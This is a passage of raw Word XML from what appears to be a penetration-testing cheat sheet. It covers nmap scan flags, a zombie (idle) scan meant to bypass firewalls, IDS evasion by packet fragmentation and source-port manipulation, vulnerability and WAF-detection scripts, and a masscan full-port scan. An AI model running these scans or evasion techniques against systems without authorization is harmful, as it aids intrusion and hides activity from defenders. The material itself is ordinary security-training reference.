              <w:t>-T</w:t>
            </w:r>
            <w:r w:rsidR="00581287" w:rsidRPr="00581287">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00581287">
              <w:tab/>
              <w:t>(1-5) Aggressiveness</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BDAC694" w14:textId="623FE5DA" w:rsidR="00581287" w:rsidRDefault="00565208" w:rsidP="002024A0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:t>Specify port range</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A46FCA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-sn </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D92717">
              <w:t>scan network- not a</w:t>
            </w:r>
            <w:r w:rsidRPr="00A46FCA">
              <w:t xml:space="preserve"> port scan</w:t>
            </w:r>
            <w:r w:rsidR="00D92717">
              <w:t>!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
              <w:t>-F</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:t>Fast (100 ports)</w:t>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sV</w:t>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00581287" w:rsidRPr="00581287">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Service </w:t>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Version </w:t>
            </w:r>
            <w:r w:rsidR="00581287">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
              <w:t>-O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:t>OS detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sC</w:t>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Default scripts (Obtrusive)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="560E5D31" w14:textId="0A11A013" w:rsidR="00565208" w:rsidRDefault="00581287" w:rsidP="002024A0">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00581287">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sY</w:t>
            </w:r>
            <w:r w:rsidRPr="00581287">
              <w:tab/>
              <w:t>SCTP INIT scan</w:t>
            </w:r>
            <w:r w:rsidRPr="00581287">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00581287">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00581287">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00581287">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sZ</w:t>
            </w:r>
            <w:r w:rsidRPr="00581287">
              <w:tab/>
              <w:t>SCTP COOKIE ECHO scan</w:t>
            </w:r>
            <w:r w:rsidR="00565208">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00565208">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00565208" w:rsidRPr="00A34471">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sL</w:t>
            </w:r>
            <w:r w:rsidR="00565208">
              <w:tab/>
              <w:t>List scan</w:t>
            </w:r>
            <w:r w:rsidR="00296B4C">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidR="00565208">
              <w:t>find hosts on</w:t>
            </w:r>
            <w:r w:rsidR="00296B4C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00565208">
              <w:t>network</w:t>
            </w:r>
            <w:r w:rsidR="00296B4C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00296B4C" w:rsidRPr="00296B4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-vv</w:t>
            </w:r>
            <w:r w:rsidR="00296B4C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00296B4C" w:rsidRPr="00296B4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Give more info</w:t>
            </w:r>
            <w:r w:rsidR="00DF5058">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00DF5058">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DF5058" w:rsidRPr="00DF5058">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-PS</w:t>
            </w:r>
            <w:r w:rsidR="00DF5058" w:rsidRPr="00DF5058">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DF5058">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DF5058" w:rsidRPr="00DF5058">
              <w:t>TCP SYN Ping</w:t>
            </w:r>
            <w:r w:rsidR="00DF5058">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DF5058">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DF5058">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DF5058" w:rsidRPr="00DF5058">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-PA</w:t>
            </w:r>
            <w:r w:rsidR="00DF5058">
              <w:tab/>
              <w:t>TCP ACK ping</w:t>
            </w:r>
            <w:r w:rsidR="00253B12">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00253B12">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00253B12" w:rsidRPr="00253B12">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-PR</w:t>
            </w:r>
            <w:r w:rsidR="00253B12">
              <w:tab/>
              <w:t>ARP Ping</w:t>
            </w:r>
            <w:r w:rsidR="00253B12">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00253B12">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00253B12">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00253B12" w:rsidRPr="00253B12">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-PE</w:t>
            </w:r>
            <w:r w:rsidR="00253B12">
              <w:tab/>
              <w:t>ICMP Echo Ping</w:t>
            </w:r>
            <w:r w:rsidR="00E45095">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00E45095">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E45095" w:rsidRPr="00E45095">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-PP</w:t>
            </w:r>
            <w:r w:rsidR="00E45095">
              <w:tab/>
              <w:t>ICMP Timestamp Ping</w:t>
            </w:r>
            <w:r w:rsidR="00E45095">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E45095">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E45095" w:rsidRPr="00E45095">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-PM</w:t>
            </w:r>
            <w:r w:rsidR="00E45095">
              <w:tab/>
              <w:t>ICMP Address Mask Ping</w:t>
            </w:r>
            <w:r w:rsidR="00DF5058">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00DF5058">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DF5058" w:rsidRPr="00DF5058">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-PU</w:t>
            </w:r>
            <w:r w:rsidR="00DF5058">
              <w:tab/>
              <w:t>UDP Ping</w:t>
            </w:r>
            <w:r w:rsidR="00C975A5">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C975A5">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002C7490">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002C7490" w:rsidRPr="005F0525">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002C7490" w:rsidRPr="005F0525">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>sP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002C7490" w:rsidRPr="005F0525">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
              <w:t>Ping scan (use SNM)</w:t>
            </w:r>
            <w:r w:rsidR="00E45095">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00E45095">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E45095" w:rsidRPr="00E45095">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-PO</w:t>
            </w:r>
            <w:r w:rsidR="00E45095">
              <w:tab/>
              <w:t>Different IP protocol probe packets are sent</w:t>
            </w:r>
            <w:r w:rsidR="00201754">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00201754" w:rsidRPr="00201754">
              <w:t>The zombie</w:t>
            </w:r>
            <w:r w:rsidR="00201754">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00201754">
              <w:t>scan from another machine in the network may be able to bypass any firewalls by scanning the machine via another machine.</w:t>
            </w:r>
            <w:r w:rsidR="005F0525">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="005F0525">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00201754" w:rsidRPr="00201754">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:r w:rsidR="00201754" w:rsidRPr="00201754">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00201754" w:rsidRPr="00201754">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-sI </w:t>
            </w:r>
            <w:r w:rsidR="00201754" w:rsidRPr="00201754">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ZOMBIE.IP.ADD.RESS TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidR="00201754">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00201754">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005F0525" w:rsidRPr="005F0525">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sI</w:t>
            </w:r>
            <w:r w:rsidR="005F0525" w:rsidRPr="005F0525">
              <w:tab/>
              <w:t>Zombie scan</w:t>
            </w:r>
            <w:r w:rsidR="00565208" w:rsidRPr="005F0525">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:t>To grab banners of a webapp, use this command:</w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00C92E4D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00C92E4D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-vv </w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00C92E4D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>www.TARGETURL</w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00C92E4D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ADDRESS</w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00C92E4D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00C92E4D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>GET / HTTP/1.0</w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00C92E4D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>(Alternatively, use Burp Suite)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565208" w14:paraId="6570D5A4" w14:textId="77777777" w:rsidTr="00581287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="00A58C43" w14:textId="6CE307E5" w:rsidR="00565208" w:rsidRDefault="00500E0F" w:rsidP="002024A0">
            <w:r>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="00565208">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6A029458" w14:textId="77777777" w:rsidR="00565208" w:rsidRDefault="00565208" w:rsidP="002024A0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8026" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0001F06A" w14:textId="7F569531" w:rsidR="00565208" w:rsidRDefault="00334788" w:rsidP="002024A0">
            <w:r>
              <w:t xml:space="preserve">If you need to evade IDS, try </w:t>
            </w:r>
            <w:r w:rsidRPr="00334788">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">to fragment the packets. Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00334788">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-sS </w:t>
            </w:r>
            <w:r>
              <w:t>to evade filtering.</w:t>
            </w:r>
            <w:r w:rsidR="00C54115">
              <w:br/>
              <w:t xml:space="preserve">Or, </w:t>
            </w:r>
            <w:r w:rsidR="00C54115" w:rsidRPr="00C54115">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-g</w:t>
            </w:r>
            <w:r w:rsidR="00C54115">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C54115" w:rsidRPr="00C54115">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00C54115" w:rsidRPr="00C54115">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C54115">
              <w:t xml:space="preserve">can be used for source port manipulation (try </w:t>
            </w:r>
            <w:r w:rsidR="00C54115" w:rsidRPr="00C54115">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-g </w:t>
            </w:r>
            <w:r w:rsidR="00C54115" w:rsidRPr="00C54115">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="00C54115">
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565208" w14:paraId="33369CAC" w14:textId="77777777" w:rsidTr="00581287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5AAE72CF" w14:textId="506E1219" w:rsidR="00565208" w:rsidRDefault="00500E0F" w:rsidP="002024A0">
            <w:r>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="00565208">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="71775FBD" w14:textId="77777777" w:rsidR="00565208" w:rsidRDefault="00565208" w:rsidP="002024A0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8026" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0BA0CF1F" w14:textId="67CA1D91" w:rsidR="00565208" w:rsidRPr="00BE1DFE" w:rsidRDefault="00565208" w:rsidP="002024A0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use nmap to </w:t>
            </w:r>
            <w:r w:rsidR="00BE1DFE">
              <w:t>check for vulnerabilities on</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> those open ports using</w:t>
            </w:r>
            <w:r w:rsidR="00BE1DFE">
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004E53E1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00BE1DFE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>script vuln</w:t>
            </w:r>
            <w:r w:rsidR="00BE1DFE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00BE1DFE" w:rsidRPr="00BE1DFE">
              <w:t>To enumerate a webapp, try using:</w:t>
            </w:r>
            <w:r w:rsidR="00BE1DFE" w:rsidRPr="00BE1DFE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BE1DFE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script=http-enum</w:t>
            </w:r>
            <w:r w:rsidR="00BE1DFE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="0074252F">
              <w:t>To detect for a WAF (WebApp Firewall), use:</w:t>
            </w:r>
            <w:r w:rsidR="00BE1DFE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BE1DFE" w:rsidRPr="0074252F">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script http-waf-detect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F66D3" w14:paraId="49DF9F88" w14:textId="77777777" w:rsidTr="00581287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4A339064" w14:textId="50C9AD6C" w:rsidR="002F66D3" w:rsidRDefault="00500E0F" w:rsidP="002024A0">
            <w:r>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="003C2CC4">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00C54115">
              <w:t>d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="37372FD5" w14:textId="29108DF8" w:rsidR="002F66D3" w:rsidRDefault="002024A0" w:rsidP="002024A0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Masscan</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>masscan</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8026" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C970F82" w14:textId="48A191CD" w:rsidR="002F66D3" w:rsidRDefault="002F66D3" w:rsidP="002024A0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Use masscan also as a means to scan a machine for open ports. Use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> masscan </w:t>
            </w:r>
            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004C6770" w:rsidRPr="004C6770">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="004C6770">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="004C6770">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>65535</w:t>
            </w:r>
            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> TARGET</w:t>
            </w:r>
            <w:r w:rsidR="004E53E1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidR="004E53E1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ADD</w:t>
            </w:r>
            <w:r w:rsidR="004E53E1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="002F66D3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">RESS </w:t>
            </w:r>
